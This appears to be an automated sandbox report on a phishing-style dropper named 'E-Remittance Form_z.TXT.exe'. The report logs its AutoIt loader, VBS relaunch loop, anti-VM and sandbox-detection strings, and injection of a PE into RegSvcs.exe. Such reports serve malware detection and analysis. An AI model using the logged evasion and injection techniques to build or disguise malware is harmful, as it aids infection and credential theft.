          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: E-Remittance Form_z.TXT.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: E-Remittance Form_z.TXT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: E-Remittance Form_z.TXT.exe
          Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp
          Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: E-Remittance Form_z.TXT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A9EE30 LoadLibraryA,GetProcAddress,2_2_00A9EE30
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile created: C:\Users\user\AppData\Local\Temp\82139548\__tmp_rar_sfx_access_check_6736515Jump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE336 push ecx; ret 1_2_009FE349
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FD870 push eax; ret 1_2_009FD88E
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AA6BD5 push ecx; ret 2_2_00AA6BE8
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ABD53C push 7400ABCFh; iretd 10_2_00ABD541
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA6BD5 push ecx; ret 10_2_00AA6BE8
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 25_2_00F44708 push esp; iretd 25_2_00F4470B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_0170326C push ss; retf 28_2_0170326D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 28_2_017032F5 push ss; retf 28_2_017032F6

          Persistence and Installation Behavior:

          barindex
          Drops PE files with a suspicious file extensionShow sources
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifJump to dropped file
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeFile created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Uses an obfuscated file name to hide its real file extension (double extension)Show sources
          Source: Possible double extension: txt.exeStatic PE information: E-Remittance Form_z.TXT.exe
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B0A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00B0A2EA
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00AC43FF
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM autoit scriptShow sources
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 3588, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 5708, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 2232, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTR
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifWindow / User API: threadDelayed 1185Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifWindow / User API: threadDelayed 1173Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifWindow / User API: threadDelayed 1101Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifWindow / User API: threadDelayed 1097
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 5696Thread sleep count: 1185 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 5696Thread sleep count: 33 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 1972Thread sleep count: 1173 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 1972Thread sleep count: 55 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 2072Thread sleep count: 1101 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 2072Thread sleep count: 53 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 5392Thread sleep count: 1097 > 30
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif TID: 5392Thread sleep count: 80 > 30
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifThread sleep count: Count: 1185 delay: -10Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifThread sleep count: Count: 1173 delay: -10Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifThread sleep count: Count: 1101 delay: -10Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifThread sleep count: Count: 1097 delay: -10
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_009EA2DF
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_009FAFB9
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A09FD3 FindFirstFileExA,1_2_00A09FD3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AC399B GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AC399B
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC399B GetFileAttributesW,FindFirstFileW,FindClose,10_2_00AC399B
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AE2408 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00AE2408
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00AD280D
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B08877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00B08877
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AECAE7 FindFirstFileW,FindNextFileW,FindClose,10_2_00AECAE7
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00AC1A73
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_00ADBCB3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AEDE7C FindFirstFileW,FindClose,10_2_00AEDE7C
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00ADBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00ADBF17
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FD353 VirtualQuery,GetSystemInfo,1_2_009FD353
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifFile opened: C:\Users\user\AppData\Local\Temp\82139548Jump to behavior
          Source: urdavsa.pif, 00000002.00000003.386488951.0000000000B6A000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe@
          Source: urdavsa.pif, 00000002.00000003.386488951.0000000000B6A000.00000004.00000001.sdmpBinary or memory string: VboxService.exe=
          Source: urdavsa.pif, 0000000A.00000003.399515071.00000000038A1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then}
          Source: urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe5FB536C7
          Source: urdavsa.pif, 00000015.00000003.519040944.0000000001C63000.00000004.00000001.sdmpBinary or memory string: VboxService.exez
          Source: rpgc.htg.1.drBinary or memory string: If ProcessExists("VMwaretray.exe") Then
          Source: rpgc.htg.1.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: urdavsa.pif, 00000015.00000003.519040944.0000000001C63000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exe6BA444D6
          Source: urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
          Source: urdavsa.pif, 00000002.00000003.386488951.0000000000B6A000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exer
          Source: urdavsa.pif, 00000015.00000003.517916403.0000000001C45000.00000004.00000001.sdmpBinary or memory string: rocessExists("VboxService.exe") ThenM72
          Source: urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe536C7jz
          Source: urdavsa.pif, 0000000A.00000003.457166893.00000000038D3000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe,r
          Source: urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenM72
          Source: rpgc.htg.1.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: urdavsa.pif, 00000002.00000003.386488951.0000000000B6A000.00000004.00000001.sdmpBinary or memory string: VMwareService.exe637D6
          Source: urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: VMwaretray.exe
          Source: rpgc.htg.1.drBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: VboxService.exe:~
          Source: urdavsa.pif, 00000015.00000003.519079213.0000000001C47000.00000004.00000001.sdmpBinary or memory string: Exists("VMwareUser.exe") Then
          Source: urdavsa.pif, 00000015.00000003.519040944.0000000001C63000.00000004.00000001.sdmp, urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
          Source: urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenv
          Source: urdavsa.pif, 00000002.00000003.386488951.0000000000B6A000.00000004.00000001.sdmpBinary or memory string: VMwareUser.exeE97637D6
          Source: urdavsa.pif, 00000015.00000003.519040944.0000000001C63000.00000004.00000001.sdmpBinary or memory string: VMwareService.exeU
          Source: urdavsa.pif, 0000000A.00000003.457166893.00000000038D3000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exeFs
          Source: urdavsa.pif, 0000000A.00000003.457166893.00000000038D3000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
          Source: urdavsa.pif, 00000002.00000003.386710610.0000000000B66000.00000004.00000001.sdmp, urdavsa.pif, 0000000A.00000003.399515071.00000000038A1000.00000004.00000001.sdmp, urdavsa.pif, 00000015.00000003.517916403.0000000001C45000.00000004.00000001.sdmp, urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: rpgc.htg.1.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AEA35D BlockInput,10_2_00AEA35D
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FE4F5
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A9EE30 LoadLibraryA,GetProcAddress,2_2_00A9EE30
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A06AF3 mov eax, dword ptr fs:[00000030h]1_2_00A06AF3
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A0ACA1 GetProcessHeap,1_2_00A0ACA1
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE643 SetUnhandledExceptionFilter,1_2_009FE643
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FE4F5
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009FE7FB
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_00A07BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A07BE1
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AAA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00AAA128
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AA7CCD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AA7CCD
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AAF170 SetUnhandledExceptionFilter,10_2_00AAF170
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AAA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00AAA128
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AA7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00AA7CCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          .NET source code references suspicious native API functionsShow sources
          Source: 28.2.RegSvcs.exe.980000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 980000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 980000 value starts with: 4D5A
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 980000
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 624000
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC6C61 LogonUserW,10_2_00AC6C61
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00A9D7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,2_2_00A9D7A0
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00AC43FF
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AC3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,10_2_00AC3321
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\82139548\run.vbs' Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif 'C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif' rpgc.htgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AD602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00AD602A
          Source: urdavsa.pif, 00000002.00000003.391144529.0000000000B88000.00000004.00000001.sdmp, urdavsa.pif, 0000000A.00000003.457166893.00000000038D3000.00000004.00000001.sdmp, urdavsa.pif, 00000015.00000003.519040944.0000000001C63000.00000004.00000001.sdmp, urdavsa.pif, 00000019.00000002.587663014.00000000045C0000.00000004.00000001.sdmpBinary or memory string: Program Manager
